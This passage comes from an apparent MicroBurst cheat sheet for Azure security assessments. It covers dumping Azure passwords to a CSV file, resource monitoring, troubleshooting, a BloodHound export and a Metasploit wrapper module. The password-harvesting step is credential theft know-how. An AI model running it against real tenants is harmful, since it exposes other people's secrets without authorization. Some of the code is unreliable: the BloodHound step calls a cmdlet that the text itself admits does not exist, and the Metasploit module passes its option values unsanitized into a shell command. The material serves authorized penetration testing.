$passwords = @(Get-AzurePasswords -SubscriptionId $SubscriptionId)
$passwords | Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information (flatten the nested VM object, or Export-Csv writes type names)
Write-Host "Gathering VM information..."
$vms = @(Get-AzVM)
$vms | Select-Object Name, ResourceGroupName, Location,
    @{ n = 'OsType'; e = { $_.StorageProfile.OsDisk.OsType } } |
    Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @{
    AssessmentDate  = Get-Date
    SubscriptionId  = $SubscriptionId
    Base            = $Base
    SubdomainsFound = $subdomains.Count
    BlobsFound      = $blobs.Count
    PasswordsFound  = $passwords.Count
    VMsFound        = $vms.Count
}
$summary | ConvertTo-Json | Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
```

### Continuous Monitoring

```powershell
# Continuous Azure monitoring
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = "C:\AzureMonitoring\monitor.log"
)
New-Item -ItemType Directory -Path (Split-Path $LogPath) -Force | Out-Null
while ($true) {
    $timestamp = Get-Date
    $since = $timestamp.AddMinutes(-$IntervalMinutes)
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append
    try {
        # Check for new storage accounts
        $newStorage = @(Get-AzStorageAccount | Where-Object { $_.CreationTime -gt $since })
        if ($newStorage.Count) {
            Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        # Check for new VMs
        $newVMs = @(Get-AzVM | Where-Object { $_.TimeCreated -gt $since })
        if ($newVMs.Count) {
            Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        # Check for new role assignments. Get-AzRoleAssignment does not return a creation
        # time, so look for successful roleAssignments/write events in the Activity Log instead
        $newRoles = @(Get-AzActivityLog -StartTime $since -EndTime $timestamp -Status Succeeded -WarningAction SilentlyContinue |
            Where-Object { $_.Authorization.Action -eq 'Microsoft.Authorization/roleAssignments/write' })
        if ($newRoles.Count) {
            Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }
    Start-Sleep -Seconds ($IntervalMinutes * 60)
}
```
## Troubleshooting

### Authentication Issues

```powershell
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}
# Verify subscription access
Get-AzSubscription
```

### Module Issues

```powershell
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst (only applies to a Gallery install; otherwise git pull the clone)
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
```

### Permission Issues

```powershell
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments | Select-Object RoleDefinitionName, Scope
# Test specific permissions
try {
    Get-AzStorageAccount -ErrorAction Stop | Out-Null
    Write-Output "Storage account read permission: OK"
}
catch {
    Write-Output "Storage account read permission: DENIED"
}
```
## Integration with Other Tools

### BloodHound Integration

```powershell
# Export data for BloodHound
$azureData = @{
    users             = Get-AzADUser
    groups            = Get-AzADGroup
    servicePrincipals = Get-AzADServicePrincipal
    roleAssignments   = Get-AzRoleAssignment
}
# Convert to BloodHound format
# Convert-AzureToBloodHound is not an Az or MicroBurst cmdlet; BloodHound's supported
# Azure collector is AzureHound, which produces the ingestible JSON directly.
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json"
```
### Metasploit Integration

```ruby
# Metasploit module for MicroBurst
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Azure MicroBurst Integration',
      'Description' => 'Execute MicroBurst functions via Metasploit',
      'Author'      => ['NetSPI'],
      'License'     => MSF_LICENSE
    ))
    register_options([
      OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
      OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
    ])
  end

  def run
    subscription_id = datastore['SUBSCRIPTION_ID']
    function = datastore['FUNCTION']
    # Build the PowerShell command line for the requested MicroBurst function
    powershell_cmd = "Import-Module MicroBurst; #{function} -SubscriptionId #{subscription_id}"
    print_status("Executing: #{powershell_cmd}")
    # Execute PowerShell command on the local host (MicroBurst and an Az session must be present)
    output = `powershell.exe -NoProfile -NonInteractive -Command "#{powershell_cmd}"`
    print_line(output)
  end
end
```
## Resources

- MicroBurst GitHub repository: https://github.com/NetSPI/MicroBurst
- NetSPI Blog
- Azure Security Documentation
- Azure Penetration Testing
- Azure Red Team Tactics

*This cheat sheet provides a complete reference for using MicroBurst. Always make sure you have appropriate authorization before performing Azure security assessments.*